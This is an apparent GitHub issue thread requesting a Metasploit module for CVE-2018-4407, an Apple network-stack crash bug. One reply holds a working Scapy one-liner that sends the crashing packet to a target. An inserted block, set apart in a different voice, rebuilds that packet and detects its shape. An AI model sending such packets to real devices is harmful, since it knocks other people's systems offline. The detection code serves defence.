I have tested on my devices, but it did not work for iOS 12 and macOS 13.6.
If there are some vulnerable env that I can reproduce the exploit, I am glad to do it.
after 2 days of failing to set up somewhere where the script worked, I realized all I needed to do was change up the script a bit to work on windows. After that, I tested on my iPad running 10.3.1 and successfully restarted it :)
@Green-m I think Corellium beta has been released which is fucking amazing but yeah lemme check. so yeah it has been released, if you are an iOS developer or researcher or whatever you can get it, idk if you have to be one of those to get it but here is the request page.
@TheBrokenWasp
I am not an iOS researcher and do not know too much about it.
@timwr is a specialist about this.
cc: @timwr
I was working on a PoC using Scapy first and then PacketFu for Metasploit, but my [redacted] got patched from under me. Currently seeking an environment as well, but it's not high on my list. @timwr should grab this if he's free.
Hi guys I'm currently at a conference so will be busy this week. @wvu-r7 maybe you can share your work in progress?
anybody make any progress yet?
Been busy with CTF development, and I'm not sure anyone wants to see me messing around in PacketFu. The library might need enhancements to do what we need, which is why I was using good ol' Scapy. External modules are a thing.
I also don't have a test device anymore. If someone wants to pick this up, have at it. While I was testing, there wasn't much info on it, but I'm sure there's a lot now.
@wvu-r7 I'll let you test on my iPad mini 2 on iOS 10.3.1 if it's safe 👍
@timwr you back from the conference? It would be great to see this go somewhere :(
My laptop just imploded :( will fix asap
:(
@timwr any progress?
Hello, guys the exploit isn't working for me. Is it the issue with Scapy, because the errors are mostly scapy based?
What errors are you seeing? This is working for me:
>>> send(IP(dst="192.168.0.2",options=[IPOption("A"*12)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
.
Sent 1 packets.
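To make the shape of that Scapy packet concrete from the monitoring side, here is an added example (not code from this thread or from Metasploit) that builds the same layout as constructed bytes, with made-up addresses, and runs a simple inspection over it: IPv4 options present plus more than one TCP MD5 signature option (kind 19), which a normal segment never carries.

```python
import socket
import struct

def build_sample_packet(dst: str = "192.168.0.2") -> bytes:
    """Constructed bytes mirroring the Scapy one-liner above; never sent anywhere."""
    ip_opts = b"A" * 12                                # 3 words of options -> IHL 8
    ihl = 5 + len(ip_opts) // 4
    # each TCP option: kind 19, length 20, 18 bytes of value
    tcp_opts = b"".join(bytes([19, 20]) + v * 18 for v in (b"1", b"2"))
    doff = 5 + len(tcp_opts) // 4                      # 20 + 40 bytes -> data offset 15
    tcp_hdr = struct.pack("!HHIIBBHHH", 40000, 2323, 0, 0, doff << 4, 0x02, 8192, 0, 0)
    total_len = 4 * ihl + len(tcp_hdr) + len(tcp_opts)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, total_len, 0, 0, 64, 6, 0,
                         socket.inet_aton("10.0.0.1"), socket.inet_aton(dst))
    return ip_hdr + ip_opts + tcp_hdr + tcp_opts       # checksums left zero: sample only

def parse_tcp_options(opts: bytes) -> list:
    # Walk TCP options and return (kind, value) pairs; stop at EOL or malformed data.
    out, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                                  # end of option list
            break
        if kind == 1:                                  # NOP is a single byte
            i += 1
            continue
        if i + 1 >= len(opts):                         # no room for a length byte
            break
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):       # malformed length
            break
        out.append((kind, opts[i + 2:i + length]))
        i += length
    return out

def inspect_packet(pkt: bytes) -> dict:
    """Signals a monitor could log: IP options present, count of TCP MD5 options."""
    ihl = (pkt[0] & 0x0F) * 4
    result = {"ip_options": ihl > 20, "tcp_md5_opts": 0, "suspicious": False}
    if pkt[9] != 6 or len(pkt) < ihl + 20:             # not TCP or truncated
        return result
    tcp = pkt[ihl:]
    doff = (tcp[12] >> 4) * 4
    opts = parse_tcp_options(tcp[20:doff])
    result["tcp_md5_opts"] = sum(1 for kind, _ in opts if kind == 19)
    # RFC 2385 allows one MD5 signature option per segment; several of them
    # together with IP options matches the shape of the packet above.
    result["suspicious"] = result["ip_options"] and result["tcp_md5_opts"] > 1
    return result
```

The same `inspect_packet` can be fed the IP payload of frames read from a pcap to count how often this shape shows up on a segment.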
@timwr make any progress yet? If not, it would be nice to know if and when somebody is going to start on this :(
Is there a reason you're not adding it yourself?
I only know python and have no clue how to code exploits.
still no progress I presume?
So, it has been a few months since I said anything about this but I'm still very hopeful about this getting added. Is anybody working on this or is this dead?
Nothing. :(
oh ok... I guess we won't have something as awesome as this xD even though it would be cool to have something like this. If anybody decides to keep trying with this I've got an iOS 10.3.1 iPad that I could test it on, as long as it doesn't permanently damage the device xD
6 months later, still no plans or anything on this?
No-one has posted to say they will work on it. The issue has been assigned to no-one, so Rapid7 aren't working on it, unless they're doing so in secret.
There may be renewed interest if RCE exploit code is ever published.
Sending the required network traffic requires root privileges, which is generally frowned upon within the framework, but not totally forbidden.
Presuming that the Metasploit team would accept this module, despite requiring root privileges, writing this module would be a good learning experience for you. Metasploit already makes use of PacketFu as a dependency, which you could use to craft the packet.
@thebrokenwasp can you implement this please? We'd love to add it
Pretty sure I've said this before, but:
I'm just a skid making suggestions. I'm 14 with too much hw (I doubt other schools give 3 hours worth of hw per night) to even learn C which was my goal. I know a little bit about scripting in python and I've tried to learn buffer overflow exploits, but even starting with stack overflows all videos are outdated. My point is, I have nowhere close enough experience needed to write even the simplest exploit, let alone this. I just like making suggestions for a tool I use so that even though I'm being a skid, I can contribute somehow
@TheBrokenWasp: You're doing fine, mate. And homework sucks, even if it's a necessary evil. I occasionally have nightmares about it still.
I appreciate that you've been submitting these tickets, even if we can't always delegate time to work on them. We might want to close this one because there's been no movement on it. We can reopen if someone wants to tackle it.
Yeah, I'm closing this. Time to dream about homework.
You think you can add an exploit for CVE-2018-4407? A Python version that crashes the phone can be found here, and an explanation of the vulnerability can be found here. Apple has classified this vulnerability as a remote code execution vulnerability because it may be possible to execute arbitrary code in the kernel, so it should be possible to add support for this exploit.